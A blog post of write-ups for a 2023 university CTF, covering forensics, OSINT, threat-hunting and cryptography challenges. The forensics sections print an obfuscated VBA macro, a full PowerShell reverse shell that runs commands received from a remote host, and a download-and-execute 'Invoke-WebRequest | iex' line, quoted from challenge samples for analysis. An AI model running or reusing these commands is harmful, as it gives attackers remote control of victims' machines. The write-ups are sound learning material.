Post

APU Battle of Hackers CTF 2023 - Writeups

This was the first CTF that I’ve participated in with new teammates @Wowiee and his friend @Damien. Sadly @Damien had covid so he could not attend the CTF physically, however, he still tried his best to solve certain challenges despite being sick. In the end we managed to achieve 13th place out of 107 teams.

Crack Store [Forensics]

Flag: ABOH23{n0t_That_KINd_oF_CR4Ck_S70RE}

We are given a zip file to presumably crack. Unfortunately I could not solve this during the competition but I attempted it at home. The challenge author @Zach told us the challenge was similar to a John Hammond video on brute forcing zip files. Analyzing the zip file, we find out that the zip is encrypted with ZipCrypto Store method which is vulnerable to the plaintext attack.

bkcrack1

According to John Hammond, we can use the bkcrack tool to crack open these zip files. Since the host file will always have # Copyright (c) 1993-2009 Microsoft Corp. at the beginning of the file, we can create our own text file using this phrase to attempt plaintext attack.

bkcrack2

bkcrack3

FürElise [Forensics]

Flag: ABOH23{d!ff1cU17_s0Ng_FROm_hEaRtBrE4K}

We are given a file without any extension called heartbroken. Checking its contents, an obfuscated function can be found. Noticing a URL can be formed by removing the repetitive ampersands (&), we can obtain two URLs after deobfuscating them.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Sub Document_Open()
    Set dCBkaW1pbm = CreateObject("WScript.Shell")
    pbmcgYXQgY3Jvc = "&h&t&t&p&s&:&/&/&"
    CBtYXR0ZXJucy = "&p&a&s&t&e&b&i&n&.&c&o&m&"
    4gb3ZlciB3ZSB = "&/&r&a&w&/&K&h&4&V&y&U&Y&c&"
    Replace(luY2lkZW50IG, "&", "")
    Replace(luZyB0aGF0IG, "&", "")
    Replace(VsZCBkZWNvZG, "&", "")
    Replace(N0b3JzLCBjb3, "&", "")
    Replace(BkZWZpbmVkIH, "&", "")
    Replace(4gY29tcGxleC, "&", "")
    Replace(pbmcgYXQgY3Jvc, "&", "")
    Replace(CBtYXR0ZXJucy, "&", "")
    Replace(4gb3ZlciB3ZSB, "&", "")
    dCBkaW1pbm.Exec("whoami")
    luY2lkZW50IG = "h&t&t&p&s&:/&/g&i&s&t&.&g&i&t&h&u&b&u&s&e&r&c&o&n&t&e&n&t&.&c&o&m&/z&a&c&h&w&o&n&g&0&2"
    luZyB0aGF0IG = "/5&a&8&e&7&d&3&6&5&c&6&d&9&b&6&4&9&b&1&2&b&e&3&c&8&9&0&c&8&c&b&4"
    VsZCBkZWNvZG = "/raw"
    N0b3JzLCBjb3 = "/85f79114e8cb93dca7d1ae44d5fdd81aa95d021e9"
    BkZWZpbmVkIH = "/gistfile1"
    4gY29tcGxleC = ".txt"
End Sub

fur1

One part of the flag can be obtained with the first URL https://pastebin.com/raw/Kh4VyUYc. However, the second URL decoded was a URL to a GitHub stored text file. Within the text file was a string encoded with Powershell, so this is probably a powershell script.

fur2

1
powershell.exe -exec bypass -enc i f   ( - n o t ( & ( $ ( [ c h a r ] ( 9 9 + 8 4 - 9 9 ) + [ c h a r ] ( 6 7 * 1 0 1 / 6 7 ) + [ c h a r ] ( 0 + 1 1 5 - 0 ) + [ c h a r ] ( 0 + 1 1 6 - 0 ) + [ c h a r ] ( 1 6 + 4 5 - 1 6 ) + [ c h a r ] ( 1 1 4 + 8 0 - 1 1 4 ) + [ c h a r ] ( 9 6 * 9 7 / 9 6 ) + [ c h a r ] ( 0 + 1 1 6 - 0 ) + [ c h a r ] ( 0 + 1 0 4 - 0 ) ) )   - P a t h   ( $ ( ' $ ' + ' e ' + ' n ' + ' v ' + ' : ' + ' U ' + ' S ' + ' E ' + ' R ' + ' P ' + ' R ' + ' O ' + ' F ' + ' I ' + ' L ' + ' E ' )   +   ( [ s t r i n g ] : : j o i n ( ' ' ,   (   ( 9 2 , 6 8 , 1 0 1 , 1 1 5 , 1 0 7 , 1 1 6 , 1 1 1 , 1 1 2 , 9 2 , 7 7 , 1 1 7 , 1 1 5 , 1 0 5 , 9 9 )   | % {   (   [ c h a r ] [ i n t ]   $ _ ) } ) )   |   %   { $ _ } ) )   - P a t h T y p e   ( ( [ s t r i n g ] : : j o i n ( ' ' ,   (   ( 7 6 , 1 0 1 , 9 7 , 1 0 2 )   | % {   (   [ c h a r ] [ i n t ]   $ _ ) } ) )   |   %   { $ _ } ) ) ) ) { 
 	 &   ( ( " j D k a v X f - p 9 8 O Y S h t M g 4 A 2 c N 5 x P I H e F 1 z y E l T n w Z m R b L K Q G i s J C 0 U W o B V d u q r 6 3 7 " ) [ 3 7 , 5 9 , 4 6 , 1 5 , 2 8 , 7 , 1 4 , 5 3 , 4 7 , 1 5 ]   - j o i n   ' ' )   ( ( ' d ' + ' o ' + ' n ' + ' t ' + '   ' + ' e ' + ' x ' + ' e ' + ' c ' + ' u ' + ' t ' + ' e ' + '   ' + ' t ' + ' h ' + ' e ' + '   ' + ' s ' + ' c ' + ' r ' + ' i ' + ' p ' + ' t ' + ' . ' + ' . ' + ' . ' + '   ' + ' a ' + ' m ' + ' a ' + ' t ' + ' e ' + ' u ' + ' r ' + '   ' + ' m ' + ' o ' + ' m ' + ' e ' + ' n ' + ' t ' + ' . ' + ' . ' + ' . ' ) ) 
 	 r e t u r n 
 } 
 $ L H O S T   =   $ ( [ c h a r ] ( 3 6 * 3 6 / 3 6 ) + [ c h a r ] ( 7 6 + 4 0 - 7 6 ) + [ c h a r ] ( 0 + 4 9 - 0 ) + [ c h a r ] ( 2 7 * 4 3 / 2 7 ) + [ c h a r ] ( 0 + 4 9 - 0 ) + [ c h a r ] ( 2 7 * 4 3 / 2 7 ) + [ c h a r ] ( 8 6 + 4 8 - 8 6 ) + [ c h a r ] ( 0 + 4 5 - 0 ) + [ c h a r ] ( 0 + 4 9 - 0 ) + [ c h a r ] ( 0 + 4 1 - 0 ) + [ c h a r ] ( 0 + 9 9 - 0 ) + [ c h a r ] ( 9 8 + 9 7 - 9 8 ) + [ c h a r ] ( 5 2 + 1 1 6 - 5 2 ) + [ c h a r ] ( 7 * 1 0 1 / 7 ) + [ c h a r ] ( 0 + 6 2 - 0 ) + [ c h a r ] ( 0 + 5 7 - 0 ) + [ c h a r ] ( 0 + 5 0 - 0 ) + [ c h a r ] ( 0 + 4 6 - 0 ) + [ c h a r ] ( 4 3 * 4 9 / 4 3 ) + [ c h a r ] ( 0 + 5 4 - 0 ) + [ c h a r ] ( 1 1 6 + 5 6 - 1 1 6 ) + [ c h a r ] ( 3 7 * 4 6 / 3 7 ) + [ c h a r ] ( 8 6 * 5 0 / 8 6 ) + [ c h a r ] ( 9 4 * 5 0 / 9 4 ) + [ c h a r ] ( 0 + 4 9 - 0 ) + [ c h a r ] ( 7 6 + 4 6 - 7 6 ) + [ c h a r ] ( 0 + 4 9 - 0 ) + [ c h a r ] ( 7 4 + 5 2 - 7 4 ) + [ c h a r ] ( 9 6 * 5 6 / 9 6 ) ) ; 
 $ L P O R T   =   ( $ ( 4 4 4 4 ) ) ; 
 $ T C P C l i e n t   =   &   ( [ s t r i n g ] : : j o i n ( ' ' ,   (   ( 7 8 , 1 0 1 , 1 1 9 , 4 5 , 7 9 , 9 8 , 1 0 6 , 1 0 1 , 9 9 , 1 1 6 )   | % {   (   [ c h a r ] [ i n t ]   $ _ ) } ) )   |   %   { $ _ } )   N e t . S o c k e t s . T C P C l i e n t ( $ L H O S T ,   $ L P O R T ) ; 
 $ N e t w o r k S t r e a m   =   $ T C P C l i e n t . G e t S t r e a m ( ) ; 
 $ S t r e a m R e a d e r   =   &   ( [ s t r i n g ] : : j o i n ( ' ' ,   (   ( 7 8 , 1 0 1 , 1 1 9 , 4 5 , 7 9 , 9 8 , 1 0 6 , 1 0 1 , 9 9 , 1 1 6 )   | % {   (   [ c h a r ] [ i n t ]   $ _ ) } ) )   |   %   { $ _ } )   I O . S t r e a m R e a d e r ( $ N e t w o r k S t r e a m ) ; 
 $ S t r e a m W r i t e r   =   &   ( [ s t r i n g ] : : j o i n ( ' ' ,   (   ( 7 8 , 1 0 1 , 1 1 9 , 4 5 , 7 9 , 9 8 , 1 0 6 , 1 0 1 , 9 9 , 1 1 6 )   | % {   (   [ c h a r ] [ i n t ]   $ _ ) } ) )   |   %   { $ _ } )   I O . S t r e a m W r i t e r ( $ N e t w o r k S t r e a m ) ; 
 $ S t r e a m W r i t e r . A u t o F l u s h   =   $ t r u e ; 
 $ B u f f e r   =   &   ( [ s t r i n g ] : : j o i n ( ' ' ,   (   ( 7 8 , 1 0 1 , 1 1 9 , 4 5 , 7 9 , 9 8 , 1 0 6 , 1 0 1 , 9 9 , 1 1 6 )   | % {   (   [ c h a r ] [ i n t ]   $ _ ) } ) )   |   %   { $ _ } )   S y s t e m . B y t e [ ]   $ ( $ ( 1 0 2 4 ) ) ; 
 w h i l e   ( $ T C P C l i e n t . C o n n e c t e d )   {   w h i l e   ( $ N e t w o r k S t r e a m . D a t a A v a i l a b l e )   {   $ R a w D a t a   =   $ N e t w o r k S t r e a m . R e a d ( $ B u f f e r ,   0 ,   $ B u f f e r . L e n g t h ) ; 
 $ c 2   =   $ ( [ c h a r ] ( 2 7 * 1 0 4 / 2 7 ) + [ c h a r ] ( 6 0 + 1 1 6 - 6 0 ) + [ c h a r ] ( 5 7 * 1 1 6 / 5 7 ) + [ c h a r ] ( 6 7 * 1 1 2 / 6 7 ) + [ c h a r ] ( 1 8 + 1 1 5 - 1 8 ) + [ c h a r ] ( 2 8 + 5 8 - 2 8 ) + [ c h a r ] ( 7 6 * 4 7 / 7 6 ) + [ c h a r ] ( 5 0 * 4 7 / 5 0 ) + [ c h a r ] ( 8 3 * 1 1 2 / 8 3 ) + [ c h a r ] ( 8 9 * 9 7 / 8 9 ) + [ c h a r ] ( 0 + 1 1 5 - 0 ) + [ c h a r ] ( 2 3 * 1 1 6 / 2 3 ) + [ c h a r ] ( 7 * 1 0 1 / 7 ) + [ c h a r ] ( 7 8 + 9 8 - 7 8 ) + [ c h a r ] ( 7 6 * 1 0 5 / 7 6 ) + [ c h a r ] ( 8 6 + 1 1 0 - 8 6 ) + [ c h a r ] ( 0 + 4 6 - 0 ) + [ c h a r ] ( 8 6 * 9 9 / 8 6 ) + [ c h a r ] ( 5 2 * 1 1 1 / 5 2 ) + [ c h a r ] ( 1 0 0 + 1 0 9 - 1 0 0 ) + [ c h a r ] ( 1 0 * 4 7 / 1 0 ) + [ c h a r ] ( 0 + 1 1 4 - 0 ) + [ c h a r ] ( 9 4 + 9 7 - 9 4 ) + [ c h a r ] ( 9 5 + 1 1 9 - 9 5 ) + [ c h a r ] ( 2 5 * 4 7 / 2 5 ) + [ c h a r ] ( 0 + 7 4 - 0 ) + [ c h a r ] ( 5 9 * 6 7 / 5 9 ) + [ c h a r ] ( 3 1 + 1 0 3 - 3 1 ) + [ c h a r ] ( 0 + 7 6 - 0 ) + [ c h a r ] ( 5 6 + 1 2 2 - 5 6 ) + [ c h a r ] ( 5 7 + 5 2 - 5 7 ) + [ c h a r ] ( 0 + 1 0 2 - 0 ) + [ c h a r ] ( 4 0 * 4 9 / 4 0 ) ) ; 
 $ C o d e   =   ( [ t e x t . e n c o d i n g ] : : U T F 8 ) . G e t S t r i n g ( $ B u f f e r ,   0 ,   $ R a w D a t a   - 1 )   } ; 
 i f   ( $ T C P C l i e n t . C o n n e c t e d   - a n d   $ C o d e . L e n g t h   - g t   1 )   {   $ O u t p u t   =   t r y   {   &   ( [ s t r i n g ] : : j o i n ( ' ' ,   (   ( 7 3 , 1 1 0 , 1 1 8 , 1 1 1 , 1 0 7 , 1 0 1 , 4 5 , 6 9 , 1 2 0 , 1 1 2 , 1 1 4 , 1 0 1 , 1 1 5 , 1 1 5 , 1 0 5 , 1 1 1 , 1 1 0 )   | % {   (   [ c h a r ] [ i n t ]   $ _ ) } ) )   |   %   { $ _ } )   ( $ C o d e )   2 > & 1   }   c a t c h   {   $ _   } ; 
 $ S t r e a m W r i t e r . W r i t e ( $ ( ( $ ( ' $ ' + ' O ' + ' u ' + ' t ' + ' p ' + ' u ' + ' t ' + ' ` ' + ' n ' ) ) ) ) ; 
 $ C o d e   =   $ n u l l   }   } ; 
 $ T C P C l i e n t . C l o s e ( ) ; 
 $ N e t w o r k S t r e a m . C l o s e ( ) ; 
 $ S t r e a m R e a d e r . C l o s e ( ) ; 
 $ S t r e a m W r i t e r . C l o s e ( ) ; 
 
 

fur3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
if (-not(&($([char](99+84-99)+[char](67*101/67)+[char](0+115-0)+[char](0+116-0)+[char](16+45-16)+[char](114+80-114)+[char](96*97/96)+[char](0+116-0)+[char](0+104-0))) -Path ($('$'+'e'+'n'+'v'+':'+'U'+'S'+'E'+'R'+'P'+'R'+'O'+'F'+'I'+'L'+'E') + ([string]::join('', ( (92,68,101,115,107,116,111,112,92,77,117,115,105,99) |%{ ( [char][int] $_)})) | % {$_})) -PathType (([string]::join('', ( (76,101,97,102) |%{ ( [char][int] $_)})) | % {$_})))){
	& (("jDkavXf-p98OYShtMg4A2cN5xPIHeF1zyElTnwZmRbLKQGisJC0UWoBVduqr637")[37,59,46,15,28,7,14,53,47,15] -join '') (('d'+'o'+'n'+'t'+' '+'e'+'x'+'e'+'c'+'u'+'t'+'e'+' '+'t'+'h'+'e'+' '+'s'+'c'+'r'+'i'+'p'+'t'+'.'+'.'+'.'+' '+'a'+'m'+'a'+'t'+'e'+'u'+'r'+' '+'m'+'o'+'m'+'e'+'n'+'t'+'.'+'.'+'.'))
	return
}
$LHOST = $([char](36*36/36)+[char](76+40-76)+[char](0+49-0)+[char](27*43/27)+[char](0+49-0)+[char](27*43/27)+[char](86+48-86)+[char](0+45-0)+[char](0+49-0)+[char](0+41-0)+[char](0+99-0)+[char](98+97-98)+[char](52+116-52)+[char](7*101/7)+[char](0+62-0)+[char](0+57-0)+[char](0+50-0)+[char](0+46-0)+[char](43*49/43)+[char](0+54-0)+[char](116+56-116)+[char](37*46/37)+[char](86*50/86)+[char](94*50/94)+[char](0+49-0)+[char](76+46-76)+[char](0+49-0)+[char](74+52-74)+[char](96*56/96));
$LPORT = ($(4444));
$TCPClient = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Net.Sockets.TCPClient($LHOST, $LPORT);
$NetworkStream = $TCPClient.GetStream();
$StreamReader = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) IO.StreamReader($NetworkStream);
$StreamWriter = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) IO.StreamWriter($NetworkStream);
$StreamWriter.AutoFlush = $true;
$Buffer = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) System.Byte[] $($(1024));
while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length);
$c2 = $([char](27*104/27)+[char](60+116-60)+[char](57*116/57)+[char](67*112/67)+[char](18+115-18)+[char](28+58-28)+[char](76*47/76)+[char](50*47/50)+[char](83*112/83)+[char](89*97/89)+[char](0+115-0)+[char](23*116/23)+[char](7*101/7)+[char](78+98-78)+[char](76*105/76)+[char](86+110-86)+[char](0+46-0)+[char](86*99/86)+[char](52*111/52)+[char](100+109-100)+[char](10*47/10)+[char](0+114-0)+[char](94+97-94)+[char](95+119-95)+[char](25*47/25)+[char](0+74-0)+[char](59*67/59)+[char](31+103-31)+[char](0+76-0)+[char](56+122-56)+[char](57+52-57)+[char](0+102-0)+[char](40*49/40));
$Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) };
if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { & ([string]::join('', ( (73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110) |%{ ( [char][int] $_)})) | % {$_}) ($Code) 2>&1 } catch { $_ };
$StreamWriter.Write($(($('$'+'O'+'u'+'t'+'p'+'u'+'t'+'`'+'n'))));
$Code = $null } };
$TCPClient.Close();
$NetworkStream.Close();
$StreamReader.Close();
$StreamWriter.Close();

Analyzing the decoded script, we can find a suspcious variable called $c2 which indicates a C2 server. Running the variable on Powershell, the second part of the flag can be obtained with the second URL https://pastebin.com/raw/JCgLz4f1.

fur4

With the two URLs, the flag can be obtained.

fur5

uwu [Forensics]

Flag: ABOH23{pER5!St3NCE_!5_my_ninj@_waY}

We are given a E01 file to investigate. Using Autopsy, an image of a Windows machine can be analyzed. Going through common directories, a credentials.txt file was found in the user’s Desktop and it shows the username and passwords of several users.

uwu1

Checking out the Downloads folder, several files with base64 encoded filenames, a password-locked zip file and a suspicious exe file called kotoamatsukami.exe can be found.

uwu2

Remembering about the credential file obtained previously, I used naruto’s password dattebayo on it and it worked. Inside the zip file was a bunch of videos and after spending 2-3 hours analyzing them, they were useless.

uwu3

Back into a loophole, I analyzed kotoamatsukami.exe by running it on my machine. Running it caused my Desktop wallpaper to change into a sharingan (Damn you Shisui!!). At this point I could not solve it before the CTF ended but I attempted it at home after reading a writeup from @OctaneSan.

uwu4

Using Procmon, I can check what it actually does in my system other than changing the wallpaper. Additionally, from the file thumbnail, kotoamatsukami.exe seems to be a Python executable. Analyzing the processes, a malicious operation that links with the registry key and shell was found.

uwu5

Jumping to the process, we can see a powershell command being invoked.

uwu6

uwu7

1
powershell -exec bypass -c 'Invoke-WebRequest https://gist.githubusercontent.com/zachwong02/9f9054bc9db15aeb453dc37e59878aac/raw/48f39f9328189ae8260c6e040eb6d3b57403135e/gistfile1.txt | iex'

Running the powershell script, it leads to an obfuscated text file which seems to be reading the metadata of the genjutsu.jpg image located in the Downloads folder. The script extracts each character of the Title metadata to craft a string. So running the command after importing the module and placing the image file in the Downloads folder, the flag can be obtained.

1
2
$chars = Get-FileMetaData $env:USERPROFILE\Downloads\genjutsu.jpg | Select-Object -ExpandProperty "Title"
$chars[0] + $chars[1] + $chars[14] + $chars[7] + $chars[54] + $chars[55] + $chars[65] + $chars[41] + $chars[4] + $chars[17] + $chars[57] + $chars[62] +$chars[18] + $chars[45] + $chars[55] + $chars[13] + $chars[2] + $chars[4] +  $chars[63] +  $chars[62] + $chars[57] + $chars[63] + $chars[38] +  $chars[50] + $chars[63] + $chars[39] +  $chars[34] + $chars[39] + $chars[35] + $chars[64] + $chars[63] + $chars[48] + $chars[26] + $chars[24] + $chars[66]

uwu8

SCP 2.0 [Forensics]

Flag: ABOH23{C0NT41nm3Nt_Breach_8Y_M@cr0$}

We are given a memory dump and a pdf file about a SCP specimen to investigate. Unfortunately I could not solve this during the competition but I attempted it at home. Thanks @Encient for her writeup! Reading the pdf file given, it says that employees are required to backup data including documentation, images, videos, etc.

scp1

Analyzing the processes and files with SCP as the keyword, a suspicious document file can be obtained.

scp2

Dumping the document file, I read its contents and found the flag file located in the user’s Desktop. However, it seems that the file was missing in the memory dump since it could not be obtained via filescan.

scp3

Referring back to the pdf file, it also mentions that employees must “eradicate” or in another words delete the data. So it seeems the flag was probably deleted and hence I should find it in another way.

scp4

This is where @Encient was smart about it, we can actually extract the MFT of the machine using a plugin from Volatility2 called mftparser. After parsing the MFT data, we can either grep .txt or $Recycle to locate the flag file since it was probably located in the Recycle bin. The flag file was named $RD0BID3.txt after deletion.

scp5

Finding the flag file, its data can be decoded to obtain the flag.

scp6

Hippity Hoppity Your Culture [OSINT]

Flag: ABOH23{Oc.1716}

We are tasked to find the registration number of a specific flute. Google it.

flute1

Who’s That Pokémon? [OSINT]

Flag: ABOH23{Charizard_VSTAR,Narrow_Miscut,9}

We are tasked to find a specific Pokemon card with its card name, error type and original grade. A CGC cert number 4302093025 was provided to start our search, so I used the official CGC card verifier to identify the card.

pokemon1

Verifying the card, we can identify the name and number of the card, but it seems that the error type and grade is not present for some reason. So I tried to just Google the cert number and found a video on a Charizard VSTAR card error.

pokemon2

Zooming into the card, the cert number proves that this is the card we are looking for, and hence the flag too.

pokemon3 spy-kids-lemme-zoom-in-on-that

We All Have That 1 K-Everything [OSINT]

Flag: ABOH23{631fee75fca0c0b9536339f34e71304c}

We are tasked to find a specific location shown in these two videos Kpop MV and the LCK trailer. Watching the videos carefully, it seems that the location shown in both videos is a container yard.

kpop1

kpop2

So I tried reverse searching the LCK image and got the exact location in this website.

kpop3

kpop4

Search the address on Google Maps to get the right location and hash it in MD5 to get the flag.

kpop5

Sky Full of Cables [OSINT]

Flag: ABOH23{Krung_Thonburi_Charoen_Nakhon}

We are tasked to find the two specific stations between the person in the picture. Reverse searching the picture, it seems that this place could potentially be in Thailand, specifically Bangkok.

train1

train2

Sadly I could not solve this before the CTF ended, so I attempted it at home. I narrowed my search by going through different parts of the picture. After several minutes of searching, I found this Youtube video that could help in finding the specific location.

train3

It looks like the location could be in Golden Line, so I continued looking for clues in the picture and found a barber at the bottom of the picture.

train4

Googling the barber store’s name 54 Barber, the location was indeed Golden Line.

train5

We can even see the tall bulky building indicated at the right corner of the picture.

train6

Now we just have to find the two stations between this line. We can see it starts at Krung Thonburi (Golden Line) and stops at Charoen Nakhon. So the flag is these two stations.

train7

A Shark Bit My Report [OSINT]

Flag: ABOH23{Ironbound_Island_Nova_Scotia}

We are tasked to the find the last ping location of a shark that bit the author’s report in her blog. Inside the author’s blog, nothing can be found. However, since the challenge said that the shark bit her report (past tense), the report can be recovered using WayBackMachine to essentially “go back in time”.

shark1

Looking through the report, it was filled with random text and irrelevent clues for finding the flag. However, there is a statement that could prove beneficial. They mentioned that the shark was a Male, so we could use that information to filter something else later on.

shark2

We also found a supposedly barcode at the bottom of the page, but after several minutes on decoding it, it was completely irrelevent. Sadly I could not solve this before the CTF ended, so I attempted it at home.

shark3

Later on, I found a website that pings ocean sharks. Since we know its a Male shark, we can filter it and narrow our search. However, the author updated the flag saying that we should change the filters to specify Tracking Activity to show the most recent only. Apparently the shark’s ping suddenly went alive the moment the CTF started (what a coincidence). With this update, many people finally knew which shark to take and the answer can be found by looking at the most recent shark ping was Bob.

shark4

shark5

Ransomware 1 [Threat Hunting]

Flag: ABOH23{Mcqqic24UJyU40JKdja0A.exe}

We are given a compromised Windows machine that was recently attacked by a ransomware to investigate. The first question was to find the filename of the ransomware somewhere inside the machine. My method was to just manually analyze common folders like Desktop, Downloads, Temp, etc. Going through all of them, I found two suspicious programs in the System32 folder. The ransomware was Mcqqic24UJyU40JKdja0A.exe.

th1

However, after the CTF ended, I felt like the best way to find suspicious executables (accordng to SANS) was by using either Amcache, Shimcache or even Prefetch files. So by using AmcacheParser from EZTools, we can extract the Amcache located in C:\Windows\appcompat\Programs\Amcache.hve and parse it to be analyze further using Timeline Explorer. Going through Timeline Explorer, we can find two suspicious executables in System32.

th2

Ransomware 2 [Threat Hunting]

Flag: ABOH23{2e1594cea1d8e012c709f3d71a4e57dcbc9d017b89f623822fc56c9f734eb491}

The second question was to identify the SHA256 hash value of the executable responsible for exfiltrating data. We know there is another suspcious program located in the same folder with the ransomware. So I analyzed the other malicious executable ifPUXc85P8DnPFx7wYHbYw.exe using VirusTotal and found out it was a filestealer program.

th3

Ransomware 3 [Threat Hunting]

Flag: ABOH23{http://146.190.89.115:8080/YPAPJDoGD3aIQlFix11ZA.php}

The third question was to identify the external connection created by ifPUXc85P8DnPFx7wYHbYw.exe. Using Virustotal again, we can see the network communications were made to 146.190.89.115:8080.

th4

May The Force Be With You [Cryptography]

Flag: ABOH23{A3S_Rul35_tH3_F0rc3}

We were given an encryption script and the encoded text.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Random import get_random_bytes
from Crypto.Protocol.KDF import PBKDF2

import textwrap

def encrypt_file(file_path, password):
    with open(file_path, 'rb') as file:
        plaintext = file.read()


    iv = get_random_bytes(AES.block_size)

    passwd = textwrap.dedent(password)[:-1]


    salt = b'salt123'  
    key = PBKDF2(passwd.encode(), salt, dkLen=16)


    cipher = AES.new(key, AES.MODE_CBC, iv)


    ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))


    encrypted_file_path = file_path + '.enc'
    with open(encrypted_file_path, 'wb') as file:
        file.write(ciphertext + iv)

    print("Encryption successful. Encrypted file saved as:", encrypted_file_path)


password = "ni5h2h?Yrq8Do?n+|6a;pKbZkv%}O~tV" 
file_path = "./flag.txt"   
encrypt_file(file_path, password)
1
2
3
N: 28161864534081810305839467239167774824180698442991360538137338315924601027539535041400325106523598882827263670671140966855944057889837783992080270143420119844958855679728614805589197733901663249220100214524859116110365815705699485099116276988534253521580223115836247118089590595980346272692504104976860138248959015932618979651746563030552421216691329694961700647328850519321776696007920491542096366696034760558758393690945535590284240994579352805664119144134863786797266463118165575746650538843159490903440899114347091988968775074879305009340592457617508211781199057573663246634610497629416920053419998682083393087987
C: 762355112596222421309825166446067448121886093544068458795156044255325081286699861240486430215279901835675723822721970949307265398924333599178805487220325668055743991293697494477706560130827449405781098938392283482757063955895656607033694619449376928780098570577226994800731087835230561205556094959240210387000
e: 3

Since the script already has the password, I created a decryption script with ChatGPT to obtain flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from Crypto.Protocol.KDF import PBKDF2
import textwrap

def decrypt_file(encrypted_file_path, password):
    with open(encrypted_file_path, 'rb') as file:
        ciphertext_iv = file.read()

    # Extract the IV (Initialization Vector) and ciphertext
    ciphertext = ciphertext_iv[:-AES.block_size]
    iv = ciphertext_iv[-AES.block_size:]

    passwd = textwrap.dedent(password)[:-1]
    salt = b'salt123'
    key = PBKDF2(passwd.encode(), salt, dkLen=16)

    cipher = AES.new(key, AES.MODE_CBC, iv)

    decrypted_data = unpad(cipher.decrypt(ciphertext), AES.block_size)

    decrypted_file_path = encrypted_file_path[:-4]  # Remove the '.enc' extension
    with open(decrypted_file_path, 'wb') as file:
        file.write(decrypted_data)

    print("Decryption successful. Decrypted file saved as:", decrypted_file_path)

password = "ni5h2h?Yrq8Do?n+|6a;pKbZkv%}O~tV"
encrypted_file_path = "./flag.txt.enc"
decrypt_file(encrypted_file_path, password)

force1

Small Sage [Cryptography]

Flag: ABOH23{rocky0ubrr!}

We are given a file encoded with sage or in another words, SageMath. This challenge was done by my teammate @Damien so credits to him. Reading the code, we see that this is an RSA implementation with small e = 3 and when the exponent of RSA is small, it is vulnerable to Coppersmith Attack.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/usr/bin/env sage
from Crypto.Util.number import bytes_to_long

p, q = random_prime(2 ^ 1024), random_prime(2 ^ 1024)
n = p*q
e = 3

assert len(flag) > e

FLAG = open("flag.txt", "rb").read().strip()
m = bytes_to_long(FLAG + b' is your challenge flag.')
c = pow(m, e, n)

print("N: ", n)
print("C: ", c)
print("e: ", e)

So my teammate created a simple python script to decrypt the flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import binascii
import gmpy2

n = 28161864534081810305839467239167774824180698442991360538137338315924601027539535041400325106523598882827263670671140966855944057889837783992080270143420119844958855679728614805589197733901663249220100214524859116110365815705699485099116276988534253521580223115836247118089590595980346272692504104976860138248959015932618979651746563030552421216691329694961700647328850519321776696007920491542096366696034760558758393690945535590284240994579352805664119144134863786797266463118165575746650538843159490903440899114347091988968775074879350009340592457617508211781199057573663246634610497629416920053419998682083393087987
e = 3
cipher_str = 762355112596222421309825166446067448121886093544068458795156044255325081286699861240486430215279901835675723822721970949307265398924333599178805487220325668055743991293697494477706560130827449405781098938392283482757063955895656607033694619449376928780098570577226994800731087835230561205556094959240210387000

gs = gmpy2.mpz(cipher_str)
gm = gmpy2.mpz(n)
ge = gmpy2.mpz(e)

root, exact = gmpy2.iroot(gs, ge)
text_output = binascii.unhexlify(format(root, 'x')).decode('utf-8')

print(text_output)

sage1

Scoreboard

Team <[script]>alert(‘troled’)</[script]>

aboh

This post is licensed under CC BY 4.0 by the author.